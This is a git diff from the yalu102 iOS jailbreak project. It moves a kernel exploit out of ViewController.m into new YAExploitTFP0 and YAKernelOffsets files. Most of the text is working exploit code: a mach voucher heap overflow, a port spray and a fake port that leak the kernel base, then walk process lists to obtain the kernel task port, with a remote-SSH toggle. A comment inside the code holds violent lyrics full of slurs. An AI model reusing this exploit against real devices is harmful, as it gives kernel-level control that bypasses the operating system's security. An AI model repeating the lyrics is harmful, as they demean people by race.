mach_msg_header_t head; - mach_msg_body_t msgh_body; - mach_msg_ool_ports_descriptor_t desc[256]; - char pad[4096]; -} sprz; +#import "YAExploitTFP0.h" +#import "YAKernelOffsets.h" +#import "jailbreak.h" +#import @interface ViewController () +@property (nonatomic, strong) YAKernelOffsets *offsets; +@property (nonatomic, weak) IBOutlet UIButton *dope; +@property (nonatomic, weak) IBOutlet UIView *sshView; +@property (nonatomic, weak) IBOutlet UISwitch *sshSwitch; + @end @implementation ViewController - (void)viewDidLoad { [super viewDidLoad]; - init_offsets(); + struct utsname u = { 0 }; uname(&u); - - if (strstr(u.version, "MarijuanARM")) { - [dope setEnabled:NO]; - [dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; + [self.dope setEnabled:NO]; + [self.dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; + return; } - // Do any additional setup after loading the view, typically from a nib. -} - -typedef natural_t not_natural_t; - -struct not_essers_ipc_object { - not_natural_t io_bits; - not_natural_t io_references; - char io_lock_data[1337]; - /* - - https://www.youtube.com/watch?v=ZADJ8S1qH3U - - - [Intro] - Lets get it - Steve Drive - R.I.P L'A Capone - OTF - These nigga's steady woofing like they want beef, want beef? - You want smoke? You want smoke? Just tell me - - [Hook] - These niggas steady woofing like they want beef, want beef?[You want smoke?] - I can make that happen if you want beef, you want beef?[You want smoke?] - Catch you while you're capping with this semi, semi - Put the semi-automatic to your kidney, kidney - - [Verse 1] - Put the semi-automatic to your kidney, kidney - I'm off the dope I got the pole you talking tough you getting smoked - These nigga's steady woofing like they want beef, but I really know - Glock or nickel yeah that bitch go, I'm going like I'm at a fucking show - I'm off Tu pack saying fuck Jojo[Fuck Jojo] - Talking shit get your life took no joke - I'm with my nigga's and my niggas ain't no joke - And if you got that fucking bag then you getting poked - And if you acting tough, I'ma fucking blow, and that's on Pluto[On Pluto] - Me and Durk finna spaz, and I put that on the guys, it's homicides - Cause we dropping Y's[Die Y, Die Y], head shot got him traumatized - And you want beef?[You want beef fu nigga?] but when I see you, you don't speak?[You don't even talk] - I got my 9 on me[Rondo] and I'ma blow and that's on me[I'm Rondo] - I'm getting tree tree[Getting dope], getting top from a bitch named Kiki - - [Chorus] - - [Verse 2] - And if you really want smoke[You want smoke little nigga?] - I will give your ass smoke[Give your ass smoke little nigga?] - This Glock 9 bitch I tote, and I will put it to your throat - I'm off this Tooka pack and no L'A, I'ma go crazy - You supposed to be my nigga but actin' like a fan that’s crazy - What the fuck wrong with these nigga's, they fugazi - I made this song for the niggas, cause they crazy - Separate me from them niggas[Separate Rondo] - Pull up on your block, with the mops - Then I hit the dip and put him up in case of attempts[Incase a nigga survive] - But we don't make throws, we shoot like Pimp[We shoot to kill] - I got 23[Two three] So i don't fucking speak[I don't speak] - Riding fast, I hit the dash, ain't gon last[You ain't gonna last nigga], I'ma blast[Cause ima blast on a nigga] - Numba Nine, bitch [I'm #9 lil nigga], and I'm a sav, bitch - - [Chorus] - */ - -}; - - - -#define IO_BITS_ACTIVE 0x80000000 -#define IKOT_TASK 2 -#define IKOT_IOKIT_CONNECT 29 -#define IKOT_CLOCK 25 - -char dt[128]; -- (IBAction)yolo:(UIButton*)sender -{ - /* - - we out here! - - */ - - mach_port_t vch = 0; - - mach_voucher_attr_recipe_data_t *data = malloc(sizeof(mach_voucher_attr_recipe_data_t) + 0x10); - data->content_size = 0; - data->key=MACH_VOUCHER_ATTR_KEY_BANK; - data->command=610; - data->previous_voucher=MACH_PORT_NULL; - - kern_return_t lol = host_create_mach_voucher(mach_host_self(), data, sizeof(mach_voucher_attr_recipe_data_t), &vch); - - assert(lol==0 && vch!=0); - - - unsigned char* odata = mmap(0, 0x8000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0); - unsigned char* fdata = mmap(odata+0x4000, 0x4000, PROT_NONE, MAP_PRIVATE|MAP_ANON|MAP_FIXED, -1, 0); - assert(fdata == odata + 0x4000); - memset(odata, 0x42, 0x0); - - - uint64_t rsz = 0x100; // alloc size; - fdata -= rsz + 0x100; // overflow full chunk - - struct not_essers_ipc_object* fakeport = mmap(0, 0x8000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0); - - mlock(fakeport, 0x8000); - - fakeport->io_bits = IO_BITS_ACTIVE | IKOT_CLOCK; - fakeport->io_lock_data[12] = 0x11; - - *(uint64_t*) (fdata + rsz) = (uint64_t) fakeport; - - - mach_port_t* ports = calloc(800, sizeof(mach_port_t)); - - for (int i = 0; i < 800; i++) { - mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &ports[i]); - mach_port_insert_right(mach_task_self(), ports[i], ports[i], MACH_MSG_TYPE_MAKE_SEND); - } - sprz msg1; - - memset(&msg1, 0, sizeof(sprz)); - sprz msg2; - - memset(&msg2, 0, sizeof(sprz)); - msg1.msgh_body.msgh_descriptor_count = 128; - - msg1.head.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0) | MACH_MSGH_BITS_COMPLEX; - msg1.head.msgh_local_port = MACH_PORT_NULL; - msg1.head.msgh_size = sizeof(msg1)-2048; - - mach_port_t* buffer = calloc(0x1000, sizeof(mach_port_t)); - for (int i = 0; i < 0x1000; i++) { - buffer[i] = MACH_PORT_DEAD; + self.offsets = [YAKernelOffsets offsetsForCurrentDevice]; + if (!self.offsets) { + [self.dope setEnabled:NO]; + [self.dope setTitle:@"kernel unsupported" forState:UIControlStateDisabled]; + return; } - - for (int i = 0; i < 256; i++) { - msg1.desc[i].address = buffer; - msg1.desc[i].count = 0x100/8; - msg1.desc[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR; - msg1.desc[i].disposition = 19; - } - - pthread_yield_np(); - for (int i=1; i<300; i++) { - msg1.head.msgh_remote_port = ports[i]; - kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); - assert(kret==0); - } - - pthread_yield_np(); - for (int i=500; i<800; i++) { - msg1.head.msgh_remote_port = ports[i]; - kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); - assert(kret==0); - } - - pthread_yield_np(); - for (int i=300; i<500; i++) { - msg1.head.msgh_remote_port = ports[i]; - if (i%4 == 0) { - msg1.msgh_body.msgh_descriptor_count = 1; - } else { - msg1.msgh_body.msgh_descriptor_count = 256; - } - kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); - assert(kret==0); - } - - pthread_yield_np(); - for (int i = 300; i<500; i+=4) { - msg2.head.msgh_local_port = ports[i]; - kern_return_t kret = mach_msg(&msg2.head, MACH_RCV_MSG, 0, sizeof(msg1), ports[i], 0, 0); - if(!(i < 380)) - ports[i] = 0; - assert(kret==0); - } - for (int i = 300; i<380; i+=4) { - msg1.head.msgh_remote_port = ports[i]; - msg1.msgh_body.msgh_descriptor_count = 1; - kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); - assert(kret==0); - } - - mach_voucher_extract_attr_recipe_trap(vch, MACH_VOUCHER_ATTR_KEY_BANK, fdata, &rsz); - mach_port_t foundport = 0; - for (int i=1; i<500; i++) { - if (ports[i]) { - msg1.head.msgh_local_port = ports[i]; - pthread_yield_np(); - kern_return_t kret = mach_msg(&msg1, MACH_RCV_MSG, 0, sizeof(msg1), ports[i], 0, 0); - assert(kret==0); - for (int k = 0; k < msg1.msgh_body.msgh_descriptor_count; k++) { - mach_port_t* ptz = msg1.desc[k].address; - for (int z = 0; z < 0x100/8; z++) { - if (ptz[z] != MACH_PORT_DEAD) { - if (ptz[z]) { - foundport = ptz[z]; - goto foundp; - } - - } - } - } - mach_msg_destroy(&msg1.head); - mach_port_deallocate(mach_task_self(), ports[i]); - ports[i] = 0; - } - } - [sender setTitle:@"failed, retry" forState:UIControlStateNormal]; - return; - -foundp: - NSLog(@"found corruption %x", foundport); - - uint64_t textbase = 0xfffffff007004000; - - for (int i = 0; i < 0x300; i++) { - for (int k = 0; k < 0x40000; k+=8) { - *(uint64_t*)(((uint64_t)fakeport) + 0x68) = textbase + i*0x100000 + 0x500000 + k; - *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; - - kern_return_t kret = clock_sleep_trap(foundport, 0, 0, 0, 0); - - if (kret != KERN_FAILURE) { - goto gotclock; - } - } - } - [sender setTitle:@"failed, retry" forState:UIControlStateNormal]; - return; - -gotclock:; - uint64_t leaked_ptr = *(uint64_t*)(((uint64_t)fakeport) + 0x68); - - leaked_ptr &= ~0x3FFF; - - fakeport->io_bits = IKOT_TASK|IO_BITS_ACTIVE; - fakeport->io_references = 0xff; - char* faketask = ((char*)fakeport) + 0x1000; - - *(uint64_t*)(((uint64_t)fakeport) + 0x68) = faketask; - *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; - *(uint64_t*) (faketask + 0x10) = 0xee; - - while (1) { - int32_t leaked = 0; - *(uint64_t*) (faketask + procoff) = leaked_ptr - 0x10; - pid_for_task(foundport, &leaked); - if (leaked == MH_MAGIC_64) { - NSLog(@"found kernel text at %llx", leaked_ptr); - break; - } - leaked_ptr -= 0x4000; + + // load settings + { + NSUserDefaults *defaults = [NSUserDefaults standardUserDefaults]; + [self.sshSwitch setOn:[defaults boolForKey:@"YAEnableRemoteSSH"]]; + [self.sshView setHidden:NO]; } - - uint64_t kernel_base = leaked_ptr; - - uint64_t allproc = allproc_offset + kernel_base; - - uint64_t proc_ = allproc; - - uint64_t myproc = 0; - uint64_t kernproc = 0; - - while (proc_) { - uint64_t proc = 0; - - *(uint64_t*) (faketask + procoff) = proc_ - 0x10; - pid_for_task(foundport, (int32_t*)&proc); - *(uint64_t*) (faketask + procoff) = 4 + proc_ - 0x10; - pid_for_task(foundport, (int32_t*)(((uint64_t)(&proc)) + 4)); - - int pd = 0; - *(uint64_t*) (faketask + procoff) = proc; - pid_for_task(foundport, &pd); - - if (pd == getpid()) { - myproc = proc; - } else if (pd == 0){ - kernproc = proc; +} + +- (IBAction)yolo:(UIButton*)sender { + mach_port_t _tfp0; + uint64_t _kernbase; + BOOL ok = [YAExploitTFP0 getTaskForPid0WithOffsets:self.offsets + taskPortResult:&_tfp0 + kernelBaseResult:&_kernbase]; + if (ok) { + // store settings + { + NSUserDefaults *defaults = [NSUserDefaults standardUserDefaults]; + [defaults setBool:self.sshSwitch.on forKey:@"YAEnableRemoteSSH"]; + [defaults synchronize]; } - proc_ = proc; - } - - - uint64_t kern_task = 0; - *(uint64_t*) (faketask + procoff) = kernproc - 0x10 + 0x18; - pid_for_task(foundport, (int32_t*)&kern_task); - *(uint64_t*) (faketask + procoff) = 4 + kernproc - 0x10 + 0x18; - pid_for_task(foundport, (int32_t*)(((uint64_t)(&kern_task)) + 4)); - - uint64_t itk_kern_sself = 0; - *(uint64_t*) (faketask + procoff) = kern_task - 0x10 + 0xe8; - pid_for_task(foundport, (int32_t*)&itk_kern_sself); - *(uint64_t*) (faketask + procoff) = 4 + kern_task - 0x10 + 0xe8; - pid_for_task(foundport, (int32_t*)(((uint64_t)(&itk_kern_sself)) + 4)); - - char* faketaskport = malloc(0x1000); - char* ktaskdump = malloc(0x1000); - - for (int i = 0; i < 0x1000/4; i++) { - *(uint64_t*) (faketask + procoff) = itk_kern_sself - 0x10 + i*4; - pid_for_task(foundport, (int32_t*)(&faketaskport[i*4])); + + // via jailbreak.h + tfp0 = _tfp0; + kernbase = _kernbase; + slide = kernbase - 0xFFFFFFF007004000; + allprocs_offset = self.offsets->allproc_offset; + rootvnode_offset = self.offsets->rootvnode_offset; + cfg_enable_remote_ssh = self.sshSwitch.on; + jailbreak(); + + [self.dope setEnabled:NO]; + [self.dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; + [self.sshView setHidden:YES]; } - for (int i = 0; i < 0x1000/4; i++) { - *(uint64_t*) (faketask + procoff) = kern_task - 0x10 + i*4; - pid_for_task(foundport, (int32_t*)(&ktaskdump[i*4])); + else { + [self.dope setTitle:@"failed, retry?" forState:UIControlStateNormal]; } - - memcpy(fakeport, faketaskport, 0x1000); - memcpy(faketask, ktaskdump, 0x1000); - - mach_port_t pt = 0; - - *(uint64_t*)(((uint64_t)fakeport) + 0x68) = faketask; - *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; - - *(uint64_t*)(((uint64_t)faketask) + 0x2b8) = itk_kern_sself; - - task_get_special_port(foundport, 4, &pt); // get tfp0 - NSLog(@"got tfp0 -> %x", pt); - fakeport->io_bits = 0; - - extern uint64_t slide; - slide = kernel_base - 0xFFFFFFF007004000; - - void exploit(void*, mach_port_t, uint64_t, uint64_t); - exploit(sender, pt, kernel_base, allproc_offset); - [dope setEnabled:NO]; - [dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; - -} - -- (void)didReceiveMemoryWarning { - [super didReceiveMemoryWarning]; - // Dispose of any resources that can be recreated. } - @end diff --git a/yalu102/YAExploitTFP0.h b/yalu102/YAExploitTFP0.h new file mode 100644 index 0000000..309e46d --- /dev/null +++ b/yalu102/YAExploitTFP0.h @@ -0,0 +1,20 @@ +// +// YAExploitTFP0.h +// yalu102 +// +// Created by qwertyoruiop on 05/01/2017. +// Copyright © 2017 kimjongcracks. All rights reserved. +// + +#import +#import + +@class YAKernelOffsets; + +@interface YAExploitTFP0 : NSObject + ++ (mach_port_t)getTaskForPid0WithOffsets:(YAKernelOffsets *)offsets + taskPortResult:(mach_port_t*)taskPort + kernelBaseResult:(uint64_t*)kernelBase; + +@end diff --git a/yalu102/YAExploitTFP0.m b/yalu102/YAExploitTFP0.m new file mode 100644 index 0000000..c8dfc0d --- /dev/null +++ b/yalu102/YAExploitTFP0.m @@ -0,0 +1,336 @@ +// +// YAExploitTFP0.m +// yalu102 +// +// Created by qwertyoruiop on 05/01/2017. +// Copyright © 2017 kimjongcracks. All rights reserved. +// + +#import "YAExploitTFP0.h" +#import "YAKernelOffsets.h" +#import +#import +#import + +typedef struct { + mach_msg_header_t head; + mach_msg_body_t msgh_body; + mach_msg_ool_ports_descriptor_t desc[256]; + char pad[4096]; +} sprz; + +typedef natural_t not_natural_t; + +struct not_essers_ipc_object { + not_natural_t io_bits; + not_natural_t io_references; + char io_lock_data[1337]; + + /* + https://www.youtube.com/watch?v=ZADJ8S1qH3U + + + [Intro] + Lets get it + Steve Drive + R.I.P L'A Capone + OTF + These nigga's steady woofing like they want beef, want beef? + You want smoke? You want smoke? Just tell me + + [Hook] + These niggas steady woofing like they want beef, want beef?[You want smoke?] + I can make that happen if you want beef, you want beef?[You want smoke?] + Catch you while you're capping with this semi, semi + Put the semi-automatic to your kidney, kidney + + [Verse 1] + Put the semi-automatic to your kidney, kidney + I'm off the dope I got the pole you talking tough you getting smoked + These nigga's steady woofing like they want beef, but I really know + Glock or nickel yeah that bitch go, I'm going like I'm at a fucking show + I'm off Tu pack saying fuck Jojo[Fuck Jojo] + Talking shit get your life took no joke + I'm with my nigga's and my niggas ain't no joke + And if you got that fucking bag then you getting poked + And if you acting tough, I'ma fucking blow, and that's on Pluto[On Pluto] + Me and Durk finna spaz, and I put that on the guys, it's homicides + Cause we dropping Y's[Die Y, Die Y], head shot got him traumatized + And you want beef?[You want beef fu nigga?] but when I see you, you don't speak?[You don't even talk] + I got my 9 on me[Rondo] and I'ma blow and that's on me[I'm Rondo] + I'm getting tree tree[Getting dope], getting top from a bitch named Kiki + + [Chorus] + + [Verse 2] + And if you really want smoke[You want smoke little nigga?] + I will give your ass smoke[Give your ass smoke little nigga?] + This Glock 9 bitch I tote, and I will put it to your throat + I'm off this Tooka pack and no L'A, I'ma go crazy + You supposed to be my nigga but actin' like a fan that’s crazy + What the fuck wrong with these nigga's, they fugazi + I made this song for the niggas, cause they crazy + Separate me from them niggas[Separate Rondo] + Pull up on your block, with the mops + Then I hit the dip and put him up in case of attempts[Incase a nigga survive] + But we don't make throws, we shoot like Pimp[We shoot to kill] + I got 23[Two three] So i don't fucking speak[I don't speak] + Riding fast, I hit the dash, ain't gon last[You ain't gonna last nigga], I'ma blast[Cause ima blast on a nigga] + Numba Nine, bitch [I'm #9 lil nigga], and I'm a sav, bitch + + [Chorus] + */ +}; + +#define IO_BITS_ACTIVE 0x80000000 +#define IKOT_TASK 2 +#define IKOT_IOKIT_CONNECT 29 +#define IKOT_CLOCK 25 + +@implementation YAExploitTFP0 + ++ (mach_port_t)getTaskForPid0WithOffsets:(YAKernelOffsets *)offsets + taskPortResult:(mach_port_t*)taskPort + kernelBaseResult:(uint64_t*)kernelBase +{ + const uint64_t procoff = offsets->procoff; + + mach_voucher_attr_recipe_data_t *data = malloc(sizeof(mach_voucher_attr_recipe_data_t) + 0x10); + data->content_size = 0; + data->key = MACH_VOUCHER_ATTR_KEY_BANK; + data->command = 610; + data->previous_voucher=MACH_PORT_NULL; + + mach_port_t vch = 0; + kern_return_t lol = host_create_mach_voucher(mach_host_self(), + (mach_voucher_attr_raw_recipe_array_t)data, + sizeof(mach_voucher_attr_recipe_data_t), + &vch); + + assert(lol==0 && vch!=0); + + unsigned char* odata = mmap(0, 0x8000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0); + unsigned char* fdata = mmap(odata+0x4000, 0x4000, PROT_NONE, MAP_PRIVATE|MAP_ANON|MAP_FIXED, -1, 0); + assert(fdata == odata + 0x4000); + memset(odata, 0x42, 0x0); + + + mach_msg_type_number_t rsz = 0x100; // alloc size; + fdata -= rsz + 0x100; // overflow full chunk + + struct not_essers_ipc_object* fakeport = mmap(0, 0x8000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0); + + mlock(fakeport, 0x8000); + + fakeport->io_bits = IO_BITS_ACTIVE | IKOT_CLOCK; + fakeport->io_lock_data[12] = 0x11; + + *(uint64_t*) (fdata + rsz) = (uint64_t) fakeport; + + mach_port_t* ports = calloc(800, sizeof(mach_port_t)); + + for (int i = 0; i < 800; i++) { + mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &ports[i]); + mach_port_insert_right(mach_task_self(), ports[i], ports[i], MACH_MSG_TYPE_MAKE_SEND); + } + + sprz msg1; + + memset(&msg1, 0, sizeof(sprz)); + sprz msg2; + + memset(&msg2, 0, sizeof(sprz)); + msg1.msgh_body.msgh_descriptor_count = 128; + + msg1.head.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0) | MACH_MSGH_BITS_COMPLEX; + msg1.head.msgh_local_port = MACH_PORT_NULL; + msg1.head.msgh_size = sizeof(msg1)-2048; + + mach_port_t* buffer = calloc(0x1000, sizeof(mach_port_t)); + for (int i = 0; i < 0x1000; i++) { + buffer[i] = MACH_PORT_DEAD; + } + + for (int i = 0; i < 256; i++) { + msg1.desc[i].address = buffer; + msg1.desc[i].count = 0x100/8; + msg1.desc[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR; + msg1.desc[i].disposition = 19; + } + + pthread_yield_np(); + for (int i=1; i<300; i++) { + msg1.head.msgh_remote_port = ports[i]; + kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); + assert(kret==0); + } + + pthread_yield_np(); + for (int i=500; i<800; i++) { + msg1.head.msgh_remote_port = ports[i]; + kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); + assert(kret==0); + } + + pthread_yield_np(); + for (int i=300; i<500; i++) { + msg1.head.msgh_remote_port = ports[i]; + if (i%4 == 0) { + msg1.msgh_body.msgh_descriptor_count = 1; + } else { + msg1.msgh_body.msgh_descriptor_count = 256; + } + kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); + assert(kret==0); + } + + pthread_yield_np(); + for (int i = 300; i<500; i+=4) { + msg2.head.msgh_local_port = ports[i]; + kern_return_t kret = mach_msg(&msg2.head, MACH_RCV_MSG, 0, sizeof(msg1), ports[i], 0, 0); + if(!(i < 380)) + ports[i] = 0; + assert(kret==0); + } + for (int i = 300; i<380; i+=4) { + msg1.head.msgh_remote_port = ports[i]; + msg1.msgh_body.msgh_descriptor_count = 1; + kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); + assert(kret==0); + } + + mach_voucher_extract_attr_recipe_trap(vch, MACH_VOUCHER_ATTR_KEY_BANK, fdata, &rsz); + mach_port_t foundport = 0; + for (int i=1; i<500; i++) { + if (ports[i]) { + msg1.head.msgh_local_port = ports[i]; + pthread_yield_np(); + kern_return_t kret = mach_msg(&msg1.head, MACH_RCV_MSG, 0, sizeof(msg1), ports[i], 0, 0); + assert(kret==0); + for (int k = 0; k < msg1.msgh_body.msgh_descriptor_count; k++) { + mach_port_t* ptz = msg1.desc[k].address; + for (int z = 0; z < 0x100/8; z++) { + if (ptz[z] != MACH_PORT_DEAD) { + if (ptz[z]) { + foundport = ptz[z]; + goto foundp; + } + + } + } + } + mach_msg_destroy(&msg1.head); + mach_port_deallocate(mach_task_self(), ports[i]); + ports[i] = 0; + } + } + return NO; + +foundp: + NSLog(@"found corruption %x", foundport); + + const uint64_t textbase = 0xfffffff007004000; + + for (int i = 0; i < 0x300; i++) { + for (int k = 0; k < 0x40000; k+=8) { + *(uint64_t*)(((uint64_t)fakeport) + 0x68) = textbase + i*0x100000 + 0x500000 + k; + *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; + + kern_return_t kret = clock_sleep_trap(foundport, 0, 0, 0, 0); + + if (kret != KERN_FAILURE) { + goto gotclock; + } + } + } + return NO; + +gotclock:; + uint64_t leaked_ptr = *(uint64_t*)(((uint64_t)fakeport) + 0x68); + + leaked_ptr &= ~0x3FFF; + + fakeport->io_bits = IKOT_TASK|IO_BITS_ACTIVE; + fakeport->io_references = 0xff; + char* faketask = ((char*)fakeport) + 0x1000; + + *(uint64_t*)(((uint64_t)fakeport) + 0x68) = (uint64_t)faketask; + *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; + *(uint64_t*) (faketask + 0x10) = 0xee; + + while (1) { + int32_t leaked = 0; + *(uint64_t*) (faketask + procoff) = leaked_ptr - 0x10; + pid_for_task(foundport, &leaked); + if (leaked == MH_MAGIC_64) { + NSLog(@"found kernel text at %llx", leaked_ptr); + break; + } + leaked_ptr -= 0x4000; + } + + *kernelBase = leaked_ptr; + uint64_t allproc = offsets->allproc_offset + *kernelBase; + uint64_t proc_ = allproc; + uint64_t kernproc = 0; + + while (proc_) { + uint64_t proc = 0; + + *(uint64_t*) (faketask + procoff) = proc_ - 0x10; + pid_for_task(foundport, (int32_t*)&proc); + *(uint64_t*) (faketask + procoff) = 4 + proc_ - 0x10; + pid_for_task(foundport, (int32_t*)(((uint64_t)(&proc)) + 4)); + + int pd = 0; + *(uint64_t*) (faketask + procoff) = proc; + pid_for_task(foundport, &pd); + + if (pd == 0){ + kernproc = proc; + } + + proc_ = proc; + } + + uint64_t kern_task = 0; + *(uint64_t*) (faketask + procoff) = kernproc - 0x10 + 0x18; + pid_for_task(foundport, (int32_t*)&kern_task); + *(uint64_t*) (faketask + procoff) = 4 + kernproc - 0x10 + 0x18; + pid_for_task(foundport, (int32_t*)(((uint64_t)(&kern_task)) + 4)); + + uint64_t itk_kern_sself = 0; + *(uint64_t*) (faketask + procoff) = kern_task - 0x10 + 0xe8; + pid_for_task(foundport, (int32_t*)&itk_kern_sself); + *(uint64_t*) (faketask + procoff) = 4 + kern_task - 0x10 + 0xe8; + pid_for_task(foundport, (int32_t*)(((uint64_t)(&itk_kern_sself)) + 4)); + + char* faketaskport = malloc(0x1000); + char* ktaskdump = malloc(0x1000); + + for (int i = 0; i < 0x1000/4; i++) { + *(uint64_t*) (faketask + procoff) = itk_kern_sself - 0x10 + i*4; + pid_for_task(foundport, (int32_t*)(&faketaskport[i*4])); + } + for (int i = 0; i < 0x1000/4; i++) { + *(uint64_t*) (faketask + procoff) = kern_task - 0x10 + i*4; + pid_for_task(foundport, (int32_t*)(&ktaskdump[i*4])); + } + + memcpy(fakeport, faketaskport, 0x1000); + memcpy(faketask, ktaskdump, 0x1000); + + *(uint64_t*)(((uint64_t)fakeport) + 0x68) = (uint64_t)faketask; + *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; + + *(uint64_t*)(((uint64_t)faketask) + 0x2b8) = itk_kern_sself; + + task_get_special_port(foundport, 4, taskPort); // get tfp0 + NSLog(@"got tfp0 -> %x", *taskPort); + + fakeport->io_bits = 0; + + return YES; +} + +@end diff --git a/yalu102/YAKernelOffsets.h b/yalu102/YAKernelOffsets.h new file mode 100644 index 0000000..4d2f611 --- /dev/null +++ b/yalu102/YAKernelOffsets.h @@ -0,0 +1,20 @@ +// +// YAKernelOffsets.h +// yalu102 +// +// Created by mologie on 29/01/2017. +// + +#import +#import + +@interface YAKernelOffsets : NSObject { +@public + uint64_t allproc_offset; + uint64_t procoff; + uint64_t rootvnode_offset; +} + ++ (instancetype)offsetsForCurrentDevice; + +@end diff --git a/yalu102/YAKernelOffsets.m b/yalu102/YAKernelOffsets.m new file mode 100644 index 0000000..95dd969 --- /dev/null +++ b/yalu102/YAKernelOffsets.m @@ -0,0 +1,48 @@ +// +// YAKernelOffsets.m +// yalu102 +// +// Created by mologie on 29/01/2017. +// + +#import "YAKernelOffsets.h" +#import + +@implementation YAKernelOffsets + ++ (instancetype)offsetsForCurrentDevice { + struct utsname u = { 0 }; + uname(&u); + printf("sysname: %s\n", u.sysname); + printf("nodename: %s\n", u.nodename); + printf("release: %s\n", u.release); + printf("version: %s\n", u.version); + printf("machine: %s\n", u.machine); + return [self offsetsForKernelVersion:[NSString stringWithUTF8String:u.version]]; +} + ++ (instancetype)offsetsForKernelVersion:(NSString *)version { + NSString *kernelsPlistFile = [[NSBundle bundleForClass:self.class] pathForResource:@"Kernels" ofType:@"plist"]; + NSDictionary *kernels = [NSDictionary dictionaryWithContentsOfFile:kernelsPlistFile]; + NSDictionary *kernel = kernels[version]; + if (kernel) { + YAKernelOffsets *offsets = [[YAKernelOffsets alloc] init]; + offsets->allproc_offset = [self parseOffset:kernel[@"allproc"]]; + offsets->procoff = 0x360; + offsets->rootvnode_offset = [self parseOffset:kernel[@"rootvnode"]]; + return offsets; + } else { + return nil; + } +} + ++ (uint64_t)parseOffset:(NSString *)offset { + NSScanner* scanner = [NSScanner scannerWithString:offset]; + if ([offset hasPrefix:@"0x"]) + scanner.scanLocation = 2; + uint64_t result = 0; + [scanner scanHexLongLong:&result]; + return result; +} + +@end diff --git a/yalu102/csflags.h b/yalu102/csflags.h new file mode 100644 index 0000000..d06e7a5 --- /dev/null +++ b/yalu102/csflags.h @@ -0,0 +1,26 @@ + +#pragma once + +#define CS_VALID 0x0000001 /* dynamically valid */ +#define CS_ADHOC 0x0000002 /* ad hoc signed */ +#define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ +#define CS_INSTALLER 0x0000008 /* has installer entitlement */ +#define CS_HARD 0x0000100 /* don't load invalid pages */ +#define CS_KILL 0x0000200 /* kill process if it becomes invalid */ +#define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */ +#define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ +#define CS_ENFORCEMENT 0x0001000 /* require enforcement */ +#define CS_REQUIRE_LV 0x0002000 /* require library validation */ +#define CS_ENTITLEMENTS_VALIDATED 0x0004000 + +#define CS_ALLOWED_MACHO 0x00ffffe + +#define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */ +#define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */ +#define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */ +#define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */ + +#define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */ +#define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */ +#define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ +#define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */ diff --git a/yalu102/devicesupport.m b/yalu102/devicesupport.m deleted file mode 100644 index 7748444..0000000 --- a/yalu102/devicesupport.m +++ /dev/null @@ -1,50 +0,0 @@ -#import -#import "devicesupport.h" -#import -#import - - -NSMutableArray* consttable = nil; -NSMutableArray* collide = nil; -int constload() { - struct utsname uts; - uname(&uts); - if (strstr(uts.version, "Marijuan")) { - return -2; - } - - NSString* strv = [NSString stringWithUTF8String:uts.version]; - NSArray *dp =[[NSArray alloc] initWithContentsOfFile: [[NSBundle mainBundle] pathForResource: @"def" ofType:@"plist"]]; - int m = 0; - collide = [NSMutableArray new]; - - for (NSDictionary* dict in dp) { - if ([dict[@"vers"] isEqualToString:strv]) { - [collide setObject:[NSMutableArray new] atIndexedSubscript:m]; - int i = 0; - for (NSString* str in dict[@"val"]) { - [collide[m] setObject:[NSNumber numberWithUnsignedLongLong:strtoull([str UTF8String], 0, 0)] atIndexedSubscript:i]; - i++; - } - m++; - } - } - if (m) { - return 0; - } - return -1; -} -char affine_const_by_surfacevt(uint64_t surfacevt_slid) -{ - for (NSArray* arr in collide) { - if ((surfacevt_slid & (0xfffff)) == ([[arr objectAtIndex:1] unsignedLongLongValue] & 0xfffff)) { - NSLog(@"affined"); - consttable = arr; - return 0; - } - } - return -1; -} -uint64_t constget(int idx){ - return [[consttable objectAtIndex:idx] unsignedLongLongValue]; -} diff --git a/yalu102/include/.gitignore 